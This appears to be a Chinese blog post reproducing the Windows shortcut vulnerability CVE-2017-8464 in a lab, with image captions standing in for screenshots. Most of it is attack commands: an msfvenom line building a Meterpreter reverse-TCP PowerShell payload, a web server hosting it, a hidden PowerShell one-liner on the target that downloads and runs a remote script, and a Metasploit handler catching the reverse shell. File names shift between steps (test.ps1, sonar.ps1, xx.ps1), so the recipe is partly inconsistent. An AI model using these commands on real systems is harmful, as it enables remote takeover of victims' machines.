CVE-2017-8464漏洞复现

该漏洞以存在一段时间,由于能力问题一直未对该漏洞利用方式进行测试,今天学过程中记录一下测试流程。

  1. 确认系统是否存在该漏洞
  2. 使用msfvenom 生成反弹shell,shell生成方式如下:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.203.1 LPORT=5555 -f psh-reflection >test.ps1


CVE-2017-8464漏洞复现_第1张图片
生成反弹shell
确认生成文件
  1. 将生成文件放到apache网站根目录

sudo cp test.ps1 /var/www/html/


复制完成
  1. 启用apache服务

sudo service apache2 start
启动服务后通过curl方式测试是否正常访问

CVE-2017-8464漏洞复现_第2张图片
服务启动
  1. 在靶机上启用powershell链接

powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://.../sonar.ps1');xx.ps1" 保存为exe文件。

CVE-2017-8464漏洞复现_第3张图片
新建快捷方式
CVE-2017-8464漏洞复现_第4张图片
保存
  1. 在攻击端监听反弹
    metasploit做以下相关配置:

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST ...
msf exploit(handler) > set LPORT ****
msf exploit(handler) > run

CVE-2017-8464漏洞复现_第5张图片
启动监听
  1. 在被攻击端运行创建快捷键
  2. msf获取到远程shell
CVE-2017-8464漏洞复现_第6张图片
反弹成功
CVE-2017-8464漏洞复现_第7张图片
执行系统命令

仅作自己测试,请勿违规使用。

你可能感兴趣的:(CVE-2017-8464漏洞复现)